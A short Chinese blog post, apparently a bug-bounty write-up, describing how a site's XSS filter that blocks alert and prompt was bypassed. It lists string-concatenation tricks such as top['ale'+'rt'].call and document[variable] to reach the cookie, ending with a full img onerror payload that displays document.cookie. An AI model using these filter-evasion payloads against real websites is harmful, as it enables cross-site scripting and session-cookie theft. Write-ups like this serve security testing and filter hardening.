其他分享
首页 > 其他分享> > 【14】xss之alert绕过&cookie绕过

【14】xss之alert绕过&cookie绕过

作者:互联网

前言

该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。

XSS 特征

拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过

xss绕过

  1. alert用top[‘ale’+‘rt’]绕过
  2. alert()用top[‘ale’+‘rt’].call绕过
  3. cookie用document[变量]绕过

最终payload

<img src=\"x\" one rror=\"c='coo'+'kie';top['ale'+'rt'].call(null,document[c])\">

标签:rt,xss,ale,alert,cookie,call,绕过
来源: https://blog.csdn.net/xiru9972/article/details/122147376